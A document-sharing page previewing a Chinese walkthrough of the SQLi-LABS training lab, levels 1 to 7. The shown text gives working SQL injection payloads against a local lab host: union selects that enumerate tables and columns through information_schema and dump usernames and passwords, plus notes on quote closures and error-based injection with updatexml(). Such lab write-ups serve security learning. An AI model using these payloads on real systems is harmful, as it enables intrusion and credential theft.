没有合适的资源?快使用搜索试试~ 我知道了~
SQLi-LABS Page-1(Basic Challenges)1-22
需积分: 0 0 下载量 3 浏览量
2024-05-18
14:25:19
上传
评论
收藏 3.47MB PDF 举报
温馨提示
试读
25页
SQLi-LABS Page-1(Basic Challenges)1-22
资源推荐
资源详情
资源评论
第一关
Less-1
查找注入点
点击
less-1
的靶场进入
进入后进行字符型注入
sql-lasb-master:8088/Less-1/?id=1' --+
判断回显位
http://sql-lasb-master:8088/Less-1/?id=-1%27%20union%20select%201,2,3%20--+
暴出表名
http://sql-lasb-master:8088/Less-1/?id=-1%27%20union%20select%201,group_concat(table_na
me),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+
爆出字段名
http://sql-lasb-master:8088/Less-1/?id=-1' union select 1,group_concat(column_name),3 from
information_schema.columns where table_schema=database() and table_name='users' --+
第二关
数字型的注入,
http://sql-lasb-master:8088/Less-2/?id=1%20--+
判断回显位
http://sql-lasb-master:8088/Less-2/?id=-1 union select 1,2,3 --+
爆出来的数据库名
sql-lasb-master:8088/Less-2/?id=-1 union select 1,2,database() --+
爆表的名
sql-lasb-master:8088/Less-2/?id=-1' union select 1,group_concat(table_name),3 from
information_schema.tables where table_schema=database() --+
爆字段名
sql-lasb-master:8088/Less-2/?id=-1 union select 1,group_concat(column_name),3 from
information_schema.columns where table_schema=database() and table_name='users' --+
爆数据
sql-lasb-master:8088/Less-2/?id=-1 union select 1,concat_ws('~',id,username,password),3 from
security.users limit 0,1 --+
第三关
单引号括号的闭合,在
id=1
后加上
’)
,其他操作与前两关相同。
第四关
双引号括号的闭合,在
id=1
后面加上
”)
即可,其他操作与一二关相同。
第五关
1 一个新的类型注入,使用?id=1’ 后发现回显了,确定为单引号闭合。
2 使用/?id=1' order by 4 --+ ,当值为 4 的时候报错,所以列数为 3.
3 利用联合查询 union 时发现仍然显示 you are
所以联合查询用不了。
4 使用报错注入 updatexml()函数+concat():拼接特殊符号和查询结果
成功利用漏洞
第六关
和第五关一样,第六关使用的是双引号闭合。
http://sql-lasb-master:8088/Less-6/?id=1" --+
第七关
1
,输入
http://sql-lasb-master:8088/Less-7/?id=1
剩余24页未读,继续阅读
资源评论
,朕
- 粉丝: 38
- 资源: 1
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功